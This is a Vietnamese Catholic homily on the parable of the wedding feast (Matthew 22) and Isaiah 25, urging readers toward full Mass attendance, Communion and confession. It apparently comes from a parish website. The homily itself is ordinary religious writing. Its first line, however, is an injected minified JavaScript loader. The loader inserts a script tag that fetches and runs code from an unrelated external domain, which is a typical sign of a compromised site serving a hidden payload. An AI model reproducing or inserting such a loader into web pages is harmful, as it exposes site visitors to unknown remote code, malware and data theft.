;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PHÚC CHO NGƯỜI ĐƯỢC DỰ TIỆC NƯỚC TRỜI – Xitô PS

PHÚC CHO NGƯỜI ĐƯỢC DỰ TIỆC NƯỚC TRỜI

Chúa Nhật XXVIII Thường Niên Năm A

PHÚC CHO NGƯỜI ĐƯỢC DỰ TIỆC NƯỚC TRỜI

( Is 25,6-10; Pl 4, 12-14.19-20; Mt 22, 1-14)

Mở đầu bài đọc I, ngôn sứ Isaia nói: “Ngày ấy, trên núi này, Đức Chúa sẽ đãi muôn dân một bữa tiệc, tiệc thịt béo, rượu ngon”. Tin mừng khẳng định thiệp mời dự tiệc Nước Trời đã gửi tới mọi người. Trước lời mời ấy người ta và chúng ta phản ứng thế nào?

Phản ứng của thực khách danh dự. Tin mừng viết: “họ không chịu đến… không thèm đếm xỉa tới, lại bỏ đi; kẻ thì đi thăm nông trại, người thì đi buôn, còn các kẻ khác lại bắt các đầy tớ của vua mà hành hạ và giết chết”. Khách được mời không chỉ từ chối mà có người giết cả sứ giả đi mời. Hành vi ấy khiến họ bị loại. Bị loại khỏi tiệc Nước trời đồng nghĩa phải vào nơi tối tăm, chịu khổ đời đời.

Phản ứng của những người được mời sau. ” Các ngươi hãy ra các ngả đường gặp ai cũng mời hết vào tiệc cưới” Tin mừng không nói cảm giác của họ như thế nào, nhưng ngôn sứ Isaia cho biết đó là cảm giác vui mừng: “nào chúng ta cùng hoan hỉ vui mừng bởi được Thiên Chúa cứu độ”. Được dự tiệc Nước trời là niềm vui, là hạnh phúc, là khát vọng đời đời của con người. Tuy nhiên, khi “nhà vua tiến vào… thấy ở đó có một người không mặc y phục lễ cưới”, liền hỏi: “này bạn, làm sao bạn vào được đây mà lại không có y phục lễ cưới?”. Y phục lễ cưới là gì? Các nhà chú giải cho đó là tấm áo đức tin khi lãnh nhận bí tích Rửa tội, mà “đức tin không hành động là đức tin chết”. Hành động của đức tin là đức ái. Bài đọc II thư thánh Phao lô gửi tín hữu Philipphe viết: “anh em đã chia sẻ với tôi khi tôi gặp cơn quẫn bách”. Một sự chia sẻ giúp nhau vượt qua khó khăn, không chỉ là tình người mà bắt nguồn từ đức tin và đức ái của người con Chúa. Khách được mời dự tiệc Nước trời: kẻ từ chối, người hân hoan, và người đến mà lại không có áo cưới. Còn chúng ta thì sao?

Tiệc Lời Chúa, tiệc Thánh Thể tiên trưng Tiệc Nước Trời Thiên Chúa vẫn dọn hằng ngày, thiệp mời đã gửi tới mỗi người. Chúng ta có cảm giác và phản ứng thế nào? Rất nhiều anh chị em hân hoan, sung sướng đến dự thánh lễ cách trọn vẹn trong tiệc Lời Chúa và rước Thánh Thể. Nhưng không thiếu người chỉ đến dự tiệc ngó, đi dự lễ ngó. Ngó bàn tiệc rồi về; ngó cha dâng lễ mà không hiệp lễ. Đi lễ ngó là người đi lễ, đi dự tiệc Thánh Thể mà không rước lễ; Đi lễ ngó là trong nhà thờ còn chỗ mà không vào, cố tình ở ngoài để hút thuốc, lướt điện thoại, lâu lâu ngó vào nhà thờ tí, chờ xong là về. Họ là những người đưa ra đủ lý do để không đi lễ: nào trời mưa, đường bẩn, nào bận việc nên tôi không thể đi lễ. Họ là ai? là chính bản thân ta chăng?

Thành công lớn nhất, hạnh phúc viên mãn nhất là được đồng bàn với Chúa trong Nước trời. Phúc này chỉ dành cho những ai tham dự thánh lễ, tiệc Thánh Thể cách trọn vẹn và kéo dài thánh lễ trong suốt cả ngày bằng đời sống bác ái, hy sinh giúp đỡ mọi người, cách riêng người bất hạnh. Ngược lại những người bây giờ đi lễ ngó, không yêu thương chia sẻ sẽ khổ gấp bội không chỉ đời này mà cả đời sau. Dụ ngôn ông nhà giàu và anh Ladaro vẫn còn như mới. Trong hỏa ngục ông nhà giàu chỉ ngó trông bàn tiệc Nước trời, nơi anh Ladaro cùng chư thánh sung sướng vui hưởng mà thèm khát, nhưng đã quá muộn. Cái kết cho người dự thánh lễ ngó và sống ích kỷ là chung số phận với ông nhà giàu, xa nhan Chúa đời đời. Ông nhà giàu đã mất phúc dự tiệc Nước Trời, nhưng chúng ta cơ hội vẫn còn. Cơ hội được đồng bàn với Chúa vẫn thuộc về những ai tin Đức Ki tô. Chúng ta tin Đức Ki tô và cũng chân nhận mình yếu đuối, đi dự lễ với ước ao được rước Mình Thánh Chúa nguồn sống, nguồn hạnh phúc, nhưng vì tội lỗi, y phục lễ cưới bị bẩn và rồi phải bấm bụng chịu đói đi về trong sự bất an và thiệt thòi. Làm sao được rước Thánh Thể Chúa? Áo bẩn phải giặt, người dơ phải tắm, linh hồn bị tội lỗi thống trị phải được thanh tẩy. Ai có thể làm sạch tâm hồn chúng ta? Bất cứ Giáo xứ nào cũng có một tiệm giặt siêu sạch mang tên Giê su Ki tô, đó là Tòa giải tội. Thánh Gioan nói: các thánh là những người đã tẩy sạch áo mình trong Máu Con Chiên là Đức Ki tô. Muốn tâm hồn trong sạch hãy đến với Giê su nơi Tòa giải tội và xưng thú tội lỗi của mình. Nơi đó Thiên Chúa nhờ sự chết và sống lại của Chúa Giê su và ban Thánh Thần tha mọi tội cho con người; Nơi Tòa giải tội Thiên Chúa không bao giờ mệt mỏi khi tha thứ cho chúng ta. Hãy đến với Đức Giê su nơi Tòa giải tội, bước vào ta là tội nhân, bước ra ta là thánh nhân, là con Chúa: là con đương nhiên được đồng bàn với Chúa trong tiệc Thánh Thể và Thiên Quốc. Được rước Chúa vào lòng, được đồng bàn với Chúa còn hạnh phúc nào hơn nữa, vậy thì còn tiếc gì mà không đến dự lễ và hiệp lễ cách trọn vẹn và sốt sắng. Đừng vì tí lợi lộc trước mắt mà đánh mất hạnh phúc Nước trời, đó là điều quá dại dội và ta sẽ phải hối hận đời đời như ông nhà giàu trong dụ ngôn. Sau thánh lễ, nếu ai chưa được phúc lãnh nhận Mình Thánh Chúa, hãy đến với tiệm giặt Giê su nơi Tòa giải tội xin ơn tha thứ và hãy nung nấu trong mình một quyết tâm giữ tâm hồn trong sạch và không bao giờ đi dự lễ ngó, nhưng đã dự tiệc Thánh Thể thì luôn dọn lòng rước Chúa Giê su Thánh Thể nguồn sống, nguồn hạnh phúc và là phúc thiên đàng của chúng ta ở đời sau.

FM. Tùy Phúc Hậu

You May Also Like

Trả lời

X